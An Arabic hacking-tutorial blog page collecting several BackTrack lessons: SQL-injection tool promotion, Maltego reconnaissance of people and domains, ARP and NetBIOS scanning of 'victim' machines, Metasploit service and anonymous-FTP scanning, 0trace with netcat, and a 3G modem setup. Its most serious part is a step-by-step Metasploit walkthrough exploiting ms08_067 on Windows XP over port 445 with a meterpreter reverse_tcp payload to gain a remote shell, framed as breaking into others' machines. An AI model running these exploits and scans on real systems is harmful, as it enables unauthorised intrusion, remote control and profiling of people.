‏إظهار الرسائل ذات التسميات backtrack. إظهار كافة الرسائل
‏إظهار الرسائل ذات التسميات backtrack. إظهار كافة الرسائل

أداة The Mole لاستغلال ثغرات SQL Injection

بسم الله الرحمن الرحيم






ان ثغرات SQL Injection من الثغرات المهمة و القوية التي تهدد أمن المواقع و الانظمة على شبكة الانترنت تعمل هذه الثغرات عن طريق الحقن و ذلك للوصول الى قواعد البيانات و اختراقها و بالتالي اختراق النظام كاملا , لذلك هي ثغرة مهمة و قوية .


عمل الهاكر و كما تعرفون على ايجاد طريقة يدوية و لاستغلال هذه الثغرات و ذلك من خلال حقن العنوان في المتصفح للوصول الى قاعدة البيانات و لكن سرعان ما أصبحت هذه العملية لا تفي بالغرض خصوصا لمختبري الاختراق فهو ليس بحاجة الى أن يقضي ذلك الوقت الطويل و هو يحقن عناوين مختلفة للوصول الى قاعدة البيانات أو ليتأكد من أن في الموقع ثغرة أم لا لذلك كان هنالك عدة أدوات لاختبار أختراق الانظمة من خلال هذه الثغرة , و من ضمن البرامج التي كانت موجودة و ما زالت برنامج havij الذي كان يستغل الثغرة بشكل أتوماتيكي و يعطيك معلومات قاعدة البيانات بدون أن تقوم أنت بشكل يدوي بتجربة احتمالات أسماء الجداول و ما الى ذلك .


و الان أيضا هنالك أداة جديدة لاستغلال مثل هذه الثغرات و هي أداة mole و هي مبرمجة بلغة بايثون و تعمل على نظامي ويندوز و لينكس .






حقيقة لن أتطرق لشرح هذه الاداة لانني سوف أضع الموقع الذي يمكنك منه تحميل الأداة و معرفة كيفية تثبيتها و صولا الى العمل عليها كما في الفيديو الذي سوف أضعه لكم


اذن التحميل و شرح التثبيت من هذا الموقع :


http://adf.ly/VK1sC
أما شرح العمل على الأداة فهو في هذا الفيديو :









أو اذا كان الفيديو غير واضح فيرجى مشاهدة على يوتيوب بشكل أوضح على الرابط التالي
http://www.youtube.com/watch?feature=player_embedded&v=H3DjiIcDNZ4


أرجو أن لا يتم استخدام الأداة بشكل خاطىء و أنا غير مسؤول عن أي استخدام خاطىء أو مخالف للقانون لهذه الاداة .



و السلام عليكم و رحمة الله و بركاته

شرح بسيط عن أداة maltego


أداة  Maltego

هي إحدى أدوات نظام باك تراك

تقوم هذه الأداة بجمع المعلومات عن الموقع بطريقة مرتبة بحيث تكون النتائج أكثر وضوحا للمستخدم , تقوم هذه الأداة بإظهار المعلومات على شكل مخطط .


تقوم الأداة باستخراج المعلومات التالية :

Domain names


Dns names


Whois information


Network blocks


IP addresses


يمكن لهذه الأداة أن تستخدم في جمع معلومات حول الناس مثل :


شركات و منظمات تتعلق بأشخاص .


عنوان البريد الالكتروني للشخص .


مواقع ويب تتعلق بشخص .


أرقام هواتف تتعلق بشخص أيضا .

طبعا هذه الأداة لها العديد من السلبيات و لكنني لن أذكرها هنا بإمكانك البحث عن في قوقل أذا كنت بحاجة تلك المعلومات .

ملاحظة يجب معرفتها عن هذه الأداة :

أنه يجب عليك التسجيل حتى تتمكن من استخدام هذه الأداة , و أن عدد مرات استخدام الأداة محدود في اليوم الواحد .


للوصول إلى هذه الأداة في نظام باك تراك اتبع المسار التالي :


Backtrack/information gathering/maltego



انوه لملاحظة عند عمل الموقع فانه يسمح لك بتغيير اسم الموقع من الجهة اليمين و لكنها لا تظهر عندي في الصورة نتيجة لخلل في البرنامج لذلك لا تنسى تغيير اسم الموقع للموقع الذي تريده عند تجربة الأداة .


الشرح مبسط و لا يشمل إلا جزء بسيط من الأداة و هو الجزء المهم .


الشرح لا يشمل إجراءات التسجيل للأداة و عمل حساب لاستخدامها .


شاهد الصور :






































و هكذا ينتهي الدرس نلقاكم في درس قادم


سلام عليكم و رحمة الله

شرح أداة ARPING و أداة ARPING2 و علاقتها ب wireshark


بسم الله الرحمن الرحيم



أولا أذكر القراء باني قد قمت بشرح بروتوكول ARP في المقالة السابقة و دراسته مهمة لفهم عمل هذه الأدوات إذا كنت تريد مراجعة المقالة السابقة اتبع الرابط التالي :

http://4you-tunisia.blogspot.com/2013/08/arp.htmll

ثانيا في هذه المقالة نبدأ في أداة Arping

و أيضا أريد أن أذكر بأن أمر Ping  المعروف هو يستخدم لمعرفة ما إذا كان السيرفر يعمل أو انه متوقف عن العمل و ذلك من خلال الدوس في ويندوز أو الشل في باك تراك بكتابة الأمر التالي :

Ping 127.0.0.1

و اذا كان الرد كما في الصورة الاولى فهذا يعني أن السيرفر شغال (يعمل) فكما نشاهد في الصورة هنالك كلمة Reply

و هي تعني رد أي أن السيرفر رد علينا و يقول أنه يعمل







أما في الصورة التالية فان السيرفر لا يعمل و ذلك واضح من الرد أن أو أن هنالك شيء ما منع السيرفر من الرد .



إذن هذا أمر Ping

فما هو Arping و ما يمكن أن نستفيد منه ؟


كما تعلمون و بعد قرأتكم للمقالة السابقة التي أشرت إليها أن بروتوكول ARP يعمل على البحث عن ال MAC Address
للأجهزة الموجودة في الشبكة الداخلية عن طريق ال IP Address

إذن نحن سوف نستخدم أدوات  ARP في باك تراك من أجل أن نجعل إحدى الأدوات تطلب ال MAC Address


و بنفس الوقت نحن نقوم بعمل تجسس على الاتصالات التي تجري بواسطة برنامج  Wireshark و بذلك نحصل على الMAC Address

عند التجسس على عمل أداة Arping

الآن لفتح برنامج
Arping
في باك تراك اذهب إلى المسار التالي :

Backtrack | Network Mapping | Identify Live Hosts |Arping

كما في الصورة





و لكن قبل أن تكتب أمر تشغيل البرنامج اذهب لبرنامج  Wireshark لتشغيله و ذلك من خلال الشل أفتح الشل و أكتب

Wireshark

و سوف يفتح لك البرنامج وهو عبارة عن برنامج محلل لنظام الشبكة

الآن أيضا سوف تظهر لك الصورة التالية




بعد ذلك اضغط كما في الصورة السابقة .
الآن بعد أن يعمل البرنامج اذهب إلى البرنامج الثاني الذي فتح و هو Arping ثم أكتب في الشل الأمر التالي :

Arping –c 3 127.0.0.1


حيث أن 127.0.0.1 هو رقم جهازك بإمكانك استبداله برقم أخر و لكن داخل شبكتك المحلية لأننا كما تحدثنا أن هذا البروتوكول يعمل في الشبكة المحلية .

شاهد الصورة




الآن اذهب إلى برنامج ال Wireshark

الذي شغلناه ليتنصت على الاتصالات , سوف تجد البرنامج مثل الصورة التالية :





شاهد الأسهم التي على اليسار إنها تشير إلى بروتوكول Arp و الأسهم التي في اليمين تشير إلى الMAC Address و أيضا بجانبه ال IP Address و بذلك نكون قد حصلنا على ال MAC Address بطريقة بسيطة جدا في الشبكات المحلية .

لن أنهي هذا الدرس قبل أن أخبركم عن أداة أخرى في نظام باك تراك يمكن من خلالها الحصول على ال MAC Address

بدون أداة Wireshark و هي أداة Arping2
يمكنك الوصول إلى هذه الأداة عن طريق فتح الشل و الدخول الى المسار التالي :
Cd /pentest/misc/arping

سوف تجد على هذا المسار مجموعة من الأدوات من ضمنها أداة Arping2

أكتب الأمر التالي لتشغيلها

./arping2 –c 3 192.168.1.1


و غير رقم الجهاز برقم جهاز عندك في الشبكة المحلية و سوف تظهر عندك أرقام مثل ما في الصورة و هي توضح ال MAC Address




هذه إحدى الطرق في الحصول على ال  MAC Address في الشبكات المحلية التي لها علاقة ببروتوكول Arp

نلتقي في دروس قادمة إن شاء الله و ربما تكون المقالة القادمة عن بروتوكول ال ICMP


و السلام عليكم و رحمة الله و بركاته

شرح بروتوكول ARP (بروتوكول ايجاد العناوين)


بسم الله الرحمن الرحيم










بروتوكول ARP أو ما يعرف ب address resolution protocol

و بالعربية يسمى بروتوكول إيجاد العناوين و هو أحد بروتوكولات TCP/IP

يستخدم هذا البروتوكول في الشبكة المحلية أو ما يسمى بالانجليزية LAN Network

و هو واحد من البروتوكولات الأساسية في هذه الشبكة المحلية


و بالنسبة لوظيفة هذا البروتوكول فانه يعمل على معرفة العنوان الفيزيائي للأجهزة الموجودة في الشبكة المحلية عن طريق العنوان العادي أو ما يسمى IP

العنوان الفيزيائي هو  MAC Address


إذن وظيفة هذا البروتوكول أنه عندما يريد جهاز أن يقوم بالإرسال داخل شبكة محلية إلى جهاز أخر داخل الشبكة فانه يبحث عن العنوان الفيزيائي للجهاز المستقبل .

كيف تتم عملية البحث عن العنوان الفيزيائي :

عندنا شيء يسمى ARP Cashe

و هي جزء من الذاكرة موجودة على بطاقة الشبكة , يستخدم هذا الجزء من الذاكرة من أجل تخزين جدول ARP


في داخل هذا الجدول يوجد بيانات هذه البيانات هي عبارة عن العناوين المنطقية و العناوين الفيزيائية التي تقابلها .

يعني لو كان مثلا عندنا أي بي بهذا الشكل

80.60.70.25

فسوف يقابله ماك بهذا الشكل مثلا

cc-00-11-55-55-dd









فالجهاز طبعا هو فقط يعرف ال  IP Address


الآن هنالك طريقتين ليتم الربط بين جهازين أو عنوانين :


الأولى : تسمى  dynamic entries

المتغيرة و ذلك لان الجدول لا يبقى في الجهاز بل يتغير أو يحذف


آلية عملها :
يبحث عن IP Address في الجدول الذي لدية و إذا وجده فانه سوف يرسل طلب للجهاز الموجود في الشبكة يسمى هذا الطلب العام
ARP Request و بذلك يقوم الجهاز صاحب الرقم المتطابق بعمل ما يسمى ب Reply Request 


الثانية : أو ما يسمى ب static entries

الساكنة وذلك لأنه لا يوجد جدول لتتغير قيمته أو يحذف


آلية عملها :
سوف يرسل طلب عام لكل الأجهزة الموجودة في الشبكة يسمى هذا الطلب العام ARP Request و بذلك يقوم الجهاز صاحب الرقم المتطابق بعمل ما يسمى ب Reply Request

بينما تتجاهل الأجهزة الأخرى الطلب و بذلك يتم الاتصال بين الجهازين و يتم تلقي الرسائل على هذا الأساس.


إذا قرأت المقالة و لم تعرف الأمور التالية فأني أنصحك بالرجوع و إعادة قراءة المقالة مرة أخرى

ARP protocol
ARP Cashe
dynamic entries
static entries
ARP Request
Reply Request


و أتمنى لكم عظيم الفائدة إن شاء الله و ألقاكم في مقالة جديدة إن شاء الله

السلام عليكم و رحمة الله و بركاته .

شرح أداة Nbtscan و معرفة البرامج التي تعمل على جهاز الضحية


بسم الله الرحمن الرحيم


أولا : NetBIOS

هو أحد أنواع البروتوكولات من حزمة TCP/IP 

قامت مايكروسوفت بإضافته من أجل أن تتمكن الأجهزة من المشاركة والاتصال فيما بينها أو ما يسمى ب Sharing

تعمل هذه الخدمة على البورتات التالية :

137 netbios name

138 netbios datagram

139 netbios session

ما نريد أن نوضحه في هذه المقالة هو أن هنالك أداة في نظام باك تراك اسمها Nbtscan هذه الأداة يمكن أن تستعمل لمسح عناوين ال
IP و تعطيك الأداة معلومات أو ناتج فيه عنوان الجهاز المصاب و اسم المستخدم للجهاز و عنوان الماك أدرس
و يمكن أيضا معرفة التطبيقات أو البرامج المثبتة على جهاز الضحية إذا كان مصابا بهذه الثغرة , و هذه طبعا معلومات مهمة جدا في أي اختراق

للدخول إلى هذه الأداة في نظام باك تراك اذهب للمسار التالي :

Backtrack | networking mapping | identify live host | nbtscan






لفحص شبكة أو مجموعة شبكات استخدم الأمر التالي :

Nbtscan 192.168.1.1 – 255

و هذا الأمر يعني أنك تريد فحص الأجهزة التي عناوينها هي من

192.168.1.1

إلى

192.168.1.255

و هذه تعتبر شبكة مكونة من مجموعة من الأجهزة كما يمكن أيضا زيادة عدد الشبكات التي تريد فحصها عن طريق التغيير في أرقام ال IP Address






أما بالنسبة للأمر الثاني الذي يمكنك من معرفة عدد من التطبيقات التي على جهاز الضحية أو الهدف هو الأمر التالي
Nbtscan -hv 192.168.1.1-254

كما يبدو واضحا في الصورة التالية











بعد شرح هذه الأداة عليك أن تعرف أن ويندوز مهدد من قبل هذه الثغرة التي تمكن المهاجم من استغلالها و الاختراق من خلال

و كيفية الاختراق من خلال هذه الثغرة سوف يوضح في مقالة أخرى إن شاء الله .


و السلام عليكم و رحمة الله و بركاته





اختراق ويندوز xp عن طريق البورت 445


بسم الله الرحمن الرحيم



كما يعرف الجميع فان ويندوز XP قد تخلت عنه شركة مايكروسوفت و توقفت عن دعمه مما بسبب كثرة ثغراته التي أصبحت منتشرة بشكل كبير و منها هذه الثغرة الموجودة في أغلب الأجهزة من هذا النظام

و أعرف أنها أصبحت ثغرة قديمة و لكن سوف أذكرها للذكرى هي و ثغرات أخرى في هذا الويندوز حتى نقول بعدها أننا نستطيع قراءة الفاتحة على روح المرحوم XP مع أننا طبعا بإمكاننا من الآن قراءتها

سوف يكون الاختبار عن طريق مشروع الميتاسبلويت

أولا : نكتب في الشل في باك تراك


Msfconsole


و ذلك لفتح الميتاسبلويت





ثانيا : نختار الثغرة عن طريق كتابة الامر التالي :


Use windows/smb/ms08_067_netapi






ثالثا : نختار البايلود و ذلك عن طريق الأمر التالي :
Set payload windows/meterpreter/reverse_tcp





رابعا : نضع عنوان الجهاز الذي نريد اختراقه و ذلك بالأمر التالي :
Set rhost 172.0.0.1






خامسا : نضع عنوان جهازنا (عنوان جهاز المهاجم) بالأمر التالي :
Set lhost 172.0.0.1

طبعا هذه العناوين و هميه قم بتغييرها حسب الأجهزة التي لديك .



سادسا : أكتب هذه الكلمة لتنفيذ الاستغلال أو الثغرة .
Exploit
و شاهد نجاح الاستغلال بالصورة التالية :




الان يمكننا تطبيق أوامر Meterpreter

لاستكمال عملية الاختراق مثلا يمكنك كتابة أمر Shell
حيث سوف يعطيك شل من جهاز الضحية (يعني شاشة الدوس)

شاهد الصورة :






إذن لقد أصبحنا الآن على الجهاز و نستطيع التحكم بأشياء كثيرة .

لكن هذا لا يكفي أنا أعرف أنك تريد معرفة أوامر ال Meterpreter



سوف أشرحها في الدرس القادم انتظرنا لتتعرف عليها .


و السلام عليكم و رحمة الله و بركاته





فحص البورتات المفتوحة بالميتاسبويت


بسم الله الرحمن الرحيم


شرح كيفية فحص البورتات المفتوحة بالميتاسبلويت

Scan Port With Metasploit



أداة ميتاسبلويت : هي ليست فقط تلك الأداة التي تحتوي على مجموعة من الثغرات يمكن استغلالها بشكل أتوماتيكي بل انها تحتوي على اضافات أخرى يمكن أن تقوم بأعمال اضافية غير استغلال الثغرات و من تلك الامور فحص الثغرات و ذلك من خلال ما يسمى auxiliary أو بالعربية أدوات مساعدة موجودة داخل الميتاسبلويت .


الأدوات المساعدة الموجودة التي يمكن من خلالها أن تقوم بفحص البورتات المفتوحة يمكن لك أن تعرفها و ذلك بعد أن تفتح أداة الميتاسبلويت يمكنك أن تكتب الجملة التالية


Search PortScan


بعد أن تكتب هذه الجملة داخل سطر أوامر ميتاسبلويت سوف تبحث الأداة عن ال auxiliaryالموجودة داخل ميتاسبلويت و بذلك سوف يظهر لك الأدوات التالية :


auxiliary/scanner/portscan/ack


auxiliary/scanner/portscan/ftpbounce


auxiliary/scanner/portscan/syn


auxiliary/scanner/portscan/tcp


auxiliary/scanner/portscan/xmas


و ذلك كما تشاهد في الصورة التالية :









نحن ان شاء الله سوف نشرح العمل على الأداة التالية : auxiliary/scanner/portscan/syn


أولا : نكتب في سطر الأوامر الأمر التالي :


Use auxiliary/scanner/portscan/syn




و بعد ذلك نضع عنوان الجهاز الذي نريد أن نفحصه و يكون الأمر كالتالي :
Set rhosts 173.194.67.94





و بعد ذلك نضع الأمر :


Set threads 50



و أخير نكتب الامر الأخير و هو أمر تشغيل العمل :


Run


و بذلك سوف تظهر النتائج كالتالي :




و بذلك ينتهي شرح اليوم نلتقي في موضوع أخر في الايام القادمة


الى اللقاء

فحص عناوين الأجهزة في الشبكات بالميتاسبلويت و كشف الخدمات عليها


بسم الله الرحمن الرحيم



الجميع يعلم أن هذه السيرفرات و الاجهزة الموجودة تحتوي بعض الخدمات و أقصد بذلك خدمة ال FTP و خدمة ال SSH و غيرها من الامور التي قد تكون موجودة في أي سيرفر و هذه الخدمات تعمل على منافذ في الجهاز مثل 21 و 443 و 23 و غيرها أيضا كيف يستفيد المخترق من هذه الخدمات انه يبحث فيها عن الثغرات أو قد يبحث فقط عن الاجهزة التي تعمل عليها مثل هذه الخدمات ليقوم بطريقته باخترق نظام هذه الاجهزة .


يمكننا من خلال أداة ميتاسبلويت أن نقوم باختبار الاجهزة الموجودة معنا على الشبكة أو خارج الشبكة و نكشف الخدمات التي عليها أو حتى الثغرة التي فيها ان كانت موجودة و ذلك من خلال أدوات مساعدة داخل مشروع الميتاسبلويت .


لدينا أولا خدمة ال FTP و هي معروفة للجميع كيف نكشف الاجهزة التي تعمل عليها هذه الاخدمة و نكشف أيضا الثغرة ان و جدت فيها , لذلك فان هنالك أداة داخل مشروع الميتاسبلويت تسمى


Scanner/ftp/ftp_version


تعمل هذه الاداة على كشف اصدار ال FTP الذي يعمل على السيرفر و يمكن استخدامها و ذلك من خلال الاوامر التالية بعد فتح مشروع الميتاسبلويت :


أولا


USE Scanner/ftp/ftp_version


وبعد ذلك


Set rhosts 192.168.138.0/24


وبعد ذلك الامر


Set threads 255


و أخيرا


Run


و بذلك سوف تقوم الأداة بفحص كل الشبكة ان كان هنالك جهاز به خدمة ال ftp أم لا .


ليس هذا فقط بل أن يمكن معرفة اذا كان هنالك جهاز في الشبكة يمكن أن يسمح لنا بالدخول بشكل متخفي anonymous و هذه الاداة تقوم بفحص سريع جدا للشبكة و تعطيك نتائج سريعة و أكيدة .


و يمكن كشف الاجهزة التي تسمح لك بالدخول متخفيا و ذلك من خلال الاوامر التالية :


أولا


Use scanner/ftp/anonumous


ثانيا


Set rhosts 192.168.138.0/24


ثالثا


Set threads 255


و أخيرا


Run


كما تلاحظ عندي في الصورة هنالك جهاز واحد في الشبكة يسمح بالدخول الى بشكل متخفي anonymous .










بهذه الطريقة يمكن الكشف عن خدمة ال FTP و امكانية اختراقها .


و أيضا هنالك أدوات أخرى يمكن أن تستخدمها لتكشف أمور أخرى على الشبكة من خلال مشروع الميتاسبلويت و من الأمثلة عليها أداة


USE scanner/snmp/snmp_login


طبعا عند استخدام هذه الأداة نكمل الخطوات كما في مثال ال FTP , يعني مثل هيك


SET rhosts 192.168.138.0/24


Set threads 255


Run


و أيضا من الادوات الاخرى التي يمكن استخدامها


Use scanner/ssh/ssh_version


و نكمل الخطوات كما في المثالين السابقين كما يلي :


SET rhosts 192.168.138.0/24


Set threads 255


Run



و أخيرا و ليس أخرا هنالك أداة أخرى أيضا و هي


Use scanner/mssql/mssql_ping


و نكمل الخطوات كما في المثال السابق كما يلي


SET rhosts 192.168.138.0/24


Set threads 255


Run



و بذلك فانه بامكانك كشف مجموعة لا بأس بها من الخدمات الموجودة على الاجهزة و على الشبكة و بسرعة هائلة جدا من خلال مشروع ميتاسبلويت الرائع و الذي يحتوي على مجموعة أدوات أيضا رائعة .


أتمنى أن يكون الشرح واضحا و أي استفسار أرجو أن تترك تعليقك

كتاب قراصنة الباك تراك باللغة العربية (فقط 29 صفحة)




كتاب قراصنة الباك تراك الذي يعتبر أول كتاب على المستوى العربي في شرح نظام الباك تراك للمبتدئين العرب , و مؤلّف الكتاب جزاه الله خيرا , لم يكمل الكتاب , لأنه مشغول و يتطلب مجهود كبير . أما الان فهاهو قد أكمل أول 29 صفحة من الكتاب لمن يريدها بامكانك تحمليها من الرابط التالي : من هنا




نسأل الله أن ينفع به أمة الاسلام .



شرح تغيير اللغة في نظام باك تراك 5 واجهة "جنوم"


بسم الله الرحمن الرحيم


إن تغيير اللغة في نظام باك تراك أصبح سهلا جدا و لكن العديد من المبتدئين لا يزالون بحاجة إلى بعض الإرشادات ليتمكنوا من العمل على هذه الأنظمة.


لتغيير اللغة في هذا النظام نذهب إلى system و ذلك من القائمة العلوية و نختار منهاpreferences و بعد ذلك نختار من قائمة preferences خيار keyboard و بعد اختيارها نختار منها تبويب layouts و بعد ذلك نضغط على Add و بعدها نختار الدولة التي نحن فيها مثلا الأردن كما في الصور و بذلك هو يختار اللغة تلقائيا و هي اللغة العربية و بعد ذلك نختار Addو ثم نغلق شاشة keyboard و بذلك يمكنك تغيير اللغة من خلال الزاوية في الأعلى كما في الصورة الاخيره .


أما الآن أترككم مع الصور الخمس التي توضح لك كيف تقوم بتغيير اللغة :
























و بذلك نكون انتهينا من هذا الشرح أتمنى أن يكون واضحا لكم و أي استفسار أرجوا أن تترك تعليقك في الأسفل و شكرا لمتابعتكم .




تثبيت مودم 3G على الباك تراك / اللينكس وتشغيلها


اولا : يجب ان تتاكد من اسم ال APN كما في الصورة حتى تكتبة لاحقا





ثانيا : يجب ان تقوم بتحميل هذة الاداة من الرابط التالي

من هنا

وان تضعها على مسار ال HOME

ثالثا : ان تفتح الشل وتطبق الاواملر التالية كما في الصورة

gunzip sakis3g.gz
chmod +x sakis3g
./sakis3g --interactive






رابعا : اختار CONNECT WITH 3G كما في الصورة





خامسا : اختار الواجهة INTERFACE #0 كما في الصورة






سادسا : اكتب ال APN الذي تحدثنا عنة في البداية كما في الصورة




وايضا مرة اخرى اكتبة





واخيرا : انظر لقد نجح الاتصال كما في الصورة











شرح أداة 0trace





هي أداة تستخدم لتتبع الأثر لجهاز معين على الشبكة, تستخدم هذه الأداة برتوكولات مثل HTTPو SNMP.


السبب الذي قد يجعلنا نستخدم هذه الأداة هي أنها تعتبر أفضل من أداة التتبع التقليدية traceroute
 حيث أن أداة 0trace قادرة على تخطي جدار الحماية.

استخدام أداة 0trace 
نحتاج الى معرفة IP الجهاز المستهدف وأيضا نحتاج إلى أداة NetCat لنقوم بعمل اتصال بيننا وبين الجهاز المستهدف عن طريقها .

الآن افتح الشل في باك تراك 4 و أكتب الأمر التالي :


/usr/local/sbin/0trace.sh eth0 192.168.144.1


طبعا إذا كانت ال Network Interface عندك مش eth0 فقم باستبدالها وكذلك لا تنسى أن تضع الIP الذي تريد أنت استهدافه وليس الIP الوجود في الأمر في الأعلى .


بعد كتابة هذا الأمر مباشرة عليك أن تفتح نافذة شل جديدة وتكتب فيها الامر التالي :


nc 192.168.144.1 80


من اجل عمل اتصال بين جهازك والجهاز المستهدف حتى تتمكن أداة 0trace من عمل التتبع من جهازك حتى الجهاز المستهدف
.لا تنسى تغيير ال IP أيضا في أمر ال NetCat .

في الصورة التالية تم الرفض أعتقد أنه بسبب الطريقة الغريبة التي اربط بها الشبكة عندي :





أما الصورة التالية فهي تبين أن الأداة قامت بتتبع الجهاز ولكنها لم تكشف كل الأجهزة التي بين الجهاز الهاكر والجهاز المستهدف :







الصورة السابقة مأخوذة من أحد الكتب الانجليزية !

أتنمى أن تكونوا استفدتم ولو القليل وشكرا لمتابعتكم



تابعونا على الفيس بوك : https://www.facebook.com/4youtunisia





 
Design by 4you-tunisia | Bloggerized by Rouini Houssem - Premium Blogger Themes | Walgreens Printable Coupons | تعريب وتطوير : الربيع العربي